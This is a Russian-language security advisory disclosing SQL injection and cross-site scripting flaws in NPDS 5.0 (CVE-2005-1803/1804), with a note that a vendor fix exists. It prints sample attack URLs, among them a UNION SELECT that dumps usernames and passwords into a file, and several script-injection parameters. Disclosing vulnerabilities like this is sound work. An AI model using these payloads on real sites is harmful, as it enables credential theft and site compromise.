Security Lab

SQL-инъекция и межсайтовый скриптинг в NPDS

Дата публикации:31.05.2005
Дата изменения:12.01.2009
Всего просмотров:1151
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2005-1803
CVE-2005-1804
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: NPDS 5.x
Уязвимые версии: NPDS 5.0

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

SQL-инъекция существует при обработке входных данных в переменной 'terme' сценария '/modules/glossaire/glossaire.php' и переменной 'query' сценария links.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды в базе данных приложения. Примеры:

http://[target]/modules.php?ModPath=glossaire&ModStar
t=glossaire&op=rech_terme&type=3&terme=''%20='%20
AND%20affiche!='0'%20UNION%20SELECT%200

http://[target]/links.php?op=search&query=google%'%20
UNION%20SELECT%200,un ame,pass,0,0,0,0,0%20
FROM%20users%20where%20uname<>''%20INTO%
20OUTFILE%20'

Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/npds/powerpack_f.php?
language=<script>aler t()</script>

http://[target]/npds/sdv_infos.php?sitename
=<script>alert()</script>

http://[target]/faq.php?myfaq=ys&id_cat=99
& categories=<script>alert()</script>

URL производителя: www.npds.org

Решение: Установите исправление от производителя.

Ссылки: NPDS Input validation holes, Xss & SQL Injection

http://www.npds.org/download.php?op=geninfo&did=115